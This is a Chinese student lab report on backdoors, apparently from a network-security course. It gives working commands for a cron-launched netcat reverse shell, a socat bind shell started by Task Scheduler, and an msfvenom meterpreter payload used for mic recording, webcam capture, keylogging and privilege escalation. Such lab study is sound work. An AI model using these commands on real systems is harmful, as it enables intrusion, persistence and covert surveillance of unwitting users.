Exp2 后门原理与实践

目录


基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

可能是我们点开某个链接的时候,自动加载了某个可执行文件,就类似于执行了实验中传入到windows中的backdoor.exe;也可能是我们点开某个网页时,该网页通过木马的方式在我们不知情的情况下自动下载了某个后门文件。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • linux中可能crontab文件被修改,周期性(定时)反向连接控制主机,只要控制主机保持侦听状态,就可以周期性启动后门,控制被控主机。
  • windows中可能是被动下载、接收了后门程序,当被控端点击运行该程序时,后门便会启动。

(3)Meterpreter有哪些给你映像深刻的功能?

能够获取被控主机的麦克风录音、获取被控主机的摄像头拍照和录像。

(4)如何发现自己有系统有没有被安装后门?

利用防火墙,在防火墙看开启的端口及对应的进程,一般不是系统默认开启的端口都是可疑的,要找一下对应的进程,找到对应进程,对相应进程进行抓包,看他通信的数据,分析是不是后门。

定期用360管家等软件对系统进行检测,及时处理疑似病毒、木马的程序。

返回目录


实践过程记录

一、使用netcat获取主机操作Shell,cron启动

首先查看WindowsIP和LinuxIP:

  • Windows下用命令ipconfig

  • Linux下用ifconfig -a

Windows获得linux的shell:

cron启动过程如下:

  1. 先在Windows系统下,监听8888端口
  2. 在Kali环境下,用crontab -e指令编辑一条定时任务,选择编辑器时选择"3";
  3. 在最后一行添加09 * * * * /bin/netcat 192.168.199.196 8888 -e /bin/sh,意思是在每个小时的第37分钟反向连接Windows主机的8888端口,设置成09的原因是我当时的时间是11点07,为了能立马看到效果,所以我将时间设置成了“09”(注意这里的IP地址应该为控制主机的IP);

4.最后运行结果如下所示:

返回目录

二、使用socat获取主机操作Shell, 任务计划启动

1.Windows+X,然后选择“控制面板”(win8下打开控制面板)

2.右上角“查看方式”选择“大图标”

3.点击管理程序->点击任务计划程序

4.选择上方菜单栏中的“操作”->“创建任务”

5.输入任务名

6.新建触发器,在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:8888 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口8888,同时把cmd.exe的stderr重定向到stdout上

7.创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行

8.socat - tcp:192.168.199.196:8888,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的8888端口,此时可以发现已经成功获得了一个cmd shell:(此处的IP地址为WindowsIP)

返回目录

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.217.128 LPORT=8888 -f exe > 20155312_backdoor.exe,注意这里的IP地址为控制端IP,即LinuxIP,可见已经生成了后门程序“20155312_backdoor.exe”

2.在Windows下执行ncat.exe -l 8888 > 20155312_backdoor.exe,这样被控主机就进入了接收文件模式

3.在Linux中执行nc 192.168.199.196 8888 < 20155312_backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP

4.传送接收文件成功,如下图所示:

5.在Kali中打开一个终端,使用msfconsole指令进入msf控制台

6.接着输入use exploit/multi/handler使用监听模块,设置payload

7.set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

8.set LHOST 192.168.20.136,这里用的是LinuxIP,和生成后门程序时指定的IP相同

9.set LPORT 8888,同样要使用相同的端口

10.开始监听

返回目录

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.使用record_mic指令可以截获一段音频:(可以+“-d 时间”来设定录制时间)

2.使用webcam_snap指令可以使用摄像头进行拍照:

3.使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

4.先使用getuid指令查看当前用户,使用getsystem指令进行提权,由于是Win8系统,提权失败:

5.其他操作:

  • 使用screenshot指令可以进行截屏
  • 用webcam stream指令可以使用摄像头进行录像
  • ……

返回目录


实验总结与体会

通过本次实验,我学会了如果对linux和windows植入后门,包括开启侦听、反向连接、生成后门程序、传送后门程序、控制被控主机、修改定时任务列表、使用socat获取主机操作Shell等。在动手实验的过程中既体会到了作为攻击者的乐趣,更加深刻的体会到了使用计算机时增强安全意识的重要性。平时上网的时候,一定要注意不点击不靠谱链接,下载软件时尽量选择官网下载,防止下载盗版软件时被捆绑下载其他后门程序。

返回目录

20155312 张竞予 Exp2 后门原理与实践的更多相关文章

  1. 20155325 Exp2 后门原理与实践

    基础问答 例举你能想到的一个后门进入到你系统中的可能方式? 乱点链接 学电脑小白不正确配置电脑 下载非官网软件 例举你知道的后门如何启动起来(win及linux)的方式? 软件:ncat socat ...

  2. 2019-2020-3 20174318张致豪《网络对抗技术》Exp2 后门原理与实践

    Exp2 后门原理与实践 前期准备 一.实验目标与基础知识 1.1 实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell,任务计划启动 使用MSF  m ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. Exp2 后门原理与实践 20165110

    Exp2 后门原理与实践 一.实验要求 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shell, 任务计划启动 3.使用MSF meterpreter(或其 ...

  5. 20145331魏澍琛《网络对抗》Exp2 后门原理与实践

    20145331魏澍琛<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 上网时候弹出一个广告说你中奖了,或者你可以贷款10万元之类 ...

  6. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  7. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  8. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  9. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

随机推荐

  1. SVN命令行操作

    参考 https://wenku.baidu.com/view/511a7d29ed630b1c59eeb5f3.html 1, 将文件checkout到本地目录 svn check out http ...

  2. .net core 2.2 修改IdentityUser主键标识类型

    .net core2.2,生成WebApi或者MVC项目后,Identity 1.增加ApplicationUser.cs文件,内容如下 public class ApplicationUser : ...

  3. Res-Family: From ResNet to SE-ResNeXt

    Res-Family: From ResNet to SE-ResNeXt 姚伟峰 http://www.cnblogs.com/Matrix_Yao/ Res-Family: From ResNet ...

  4. linux大文件读取

    在生产环境中有时候可能会遇到大文件的读取问题,但是大文件读取如果按照一般的手法.如cat这种都是对io的一个挑战,如果io扛得住还好,如果扛不住 造成的后果,如服务器内存奔溃,日志损坏 方法一: se ...

  5. Pandas透视表和交叉表

    透视表 参数名 说明 values 待聚合的列的名称.默认聚合所有数值列 index 用于分组的列名或其他分组键,出现在结果透视表的行 columns 用于分组的列表或其他分组键,出现在结果透视表的列 ...

  6. 23. Merge k Sorted Lists (JAVA)

    Merge k sorted linked lists and return it as one sorted list. Analyze and describe its complexity. E ...

  7. ROC AUC

    1.什么是性能度量? 我们都知道机器学习要建模,但是对于模型性能的好坏(即模型的泛化能力),我们并不知道是怎样的,很可能这个模型就是一个差的模型,泛化能力弱,对测试集不能很好的预测或分类.那么如何知道 ...

  8. OO_多线程电梯_单元总结

    概述: 面向对象的第二单元是多线程电梯.第一次实现一部傻瓜电梯,每次只送一个人:第二次实现一部可稍带电梯:第三次实现三部可稍带电梯. 一.设计策略 1.第5.6次作业设计思路 第5.6次作业的架构相似 ...

  9. CentOS7下开放端口

    memcached等服务启动后,外网默认是无法访问的,因为防火墙不允许,所以要开启防火墙,让其可以访问这些端口号. 方法一:使用firewall 1.运行命令:firewall-cmd --get-a ...

  10. 微信支付遇到的坑---缺少参数total_fee

    今天在做微信砍价成功后支付,出现了这个报错 看到报错后,去找total_fee这个参数,调试了半天,total_fee是确定有值的 微信支付的步骤 ① 预支付 商户号,商户秘钥,appid,appse ...